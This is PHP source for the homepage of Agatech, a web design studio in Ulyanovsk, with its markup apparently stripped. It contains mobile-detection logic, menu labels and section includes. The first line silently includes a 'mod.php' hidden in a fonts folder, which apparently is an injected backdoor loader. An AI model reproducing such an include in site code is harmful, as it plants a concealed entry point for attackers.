@include_once('/var/www/agatech/www/static.agatech.ru/fonts/CenturyGothicRegular/mod.php');
header("Location: http://agatech.ru");
include 'mdetect.php';
$detect = new Mobile_Detect();
?>
Agatech - Создание и продвижение сайтов в Ульяновске
/* */?>
/*
*/?>
if ($detect->isMobile()) {
?>
}
else
{
?>
}
?>
if ($detect->isMobile()) {
// выводим мобильную версию сайта (меню)
?>
Привлечение клиентов
Отзывы
Портфолио
Услуги
Гарантии
Контакты
}
else
{
?>
Привлечение клиентов
Отзывы
Портфолио
Услуги
Гарантии
Контакты
На новый сайт
}
?>
include 'incmain/slider.php';
include 'incmain/clients.php';
include 'incmain/reviews.php';
include 'incmain/portfolio.php';
include 'incmain/services.php';
include 'incmain/garant.php';
include 'incmain/contact.php';
?>